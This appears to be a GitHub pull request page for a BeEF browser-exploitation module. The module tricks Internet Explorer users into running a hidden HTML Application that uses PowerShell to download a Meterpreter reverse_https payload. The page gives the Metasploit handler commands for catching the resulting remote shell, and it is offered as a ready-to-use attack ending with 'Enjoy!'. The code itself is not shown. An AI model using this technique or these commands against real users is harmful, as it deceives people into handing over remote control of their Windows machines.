zeknox
commented
10 years ago merged 56e823aa7c0ba2f82398d7b322ea27b36f9cd7cb
Closed antisnatchor closed 10 years ago
zeknox
commented
10 years ago merged 56e823aa7c0ba2f82398d7b322ea27b36f9cd7cb
Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame via BeEF (see social_engineering->hta_powershell module).
The payload is obviously InternetExplorer only (and on Windows targets with powershell installed, so from Windows Vista to more recent versions like 7 and 8). If the user allows execution, powershell is used to download the payload (by @mattifestation) from BeEF.
The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.
Before launching the module, do the following on Metasploit: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST x.x.x.x set LPORT 443 set ExitOnSession false set AutoRunScript post/windows/manage/smart_migrate exploit -j -z
Enjoy!